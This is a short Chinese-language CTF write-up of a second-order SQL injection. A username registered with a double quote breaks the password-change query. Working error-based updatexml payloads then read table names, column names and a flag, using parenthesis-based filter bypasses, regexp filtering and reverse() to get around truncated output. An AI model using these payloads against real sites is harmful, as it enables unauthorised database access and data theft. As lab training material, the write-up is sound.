直接登录没有反应
然后注册的时候直接随便注册一个账号,登录之后没发现有啥提示除了url有个title
然后发现可以修改密码
但是还是没有我们想要的hint,重新开靶机注册账号admin'
,还是没有用,继续刷靶机,注册admin"
修改密码出现了报错,报错注入开始
我尝试在改密码界面注入,但是没有任何回显
仔细想想与我们之前做的不同的应该是注册页面
admin' ->admin" ->报错注入语句,用引号闭合,那么我们是不是可以得到信息
成功
-1"||updatexml(1,concat(0x7e,database(),0x7e),3)#
-1"||updatexml(1,concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata)(limit)4,1),0x7e),3)#
这个应该是没有写错的,但是不能成功
很多查行数的都被过滤了mid limit right left
那估计就是不让查库名,我们直接爆表吧
-1"||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),3)#
-1"||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),0x7e),3)#
这个列名是我猜的后面知道原来可以这样绕过
real_flag_1s_here
-1"||updatexml(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),1),3)#
查flag的时候发现有很多其他的数据那么这里就需要使用到一个查找
-1"||updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),1),3)#
flag{c7dc7860-822f-4d21-b505-c5
-1"||updatexml(1,concat(1,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1),3)#
}dcf50d62655c-505b-12d4-f228-068
def reverse_string(input_string):
reversed_string = input_string[::-1]
return reversed_string
# 测试字符串
input_str = "}dcf50d62655c-505b-12d4-f228-068"
# 调用函数并输出结果
reversed_str = reverse_string(input_str)
print(reversed_str)
flag{c7dc7860-822f-4d21-b505-c55626d05fcd}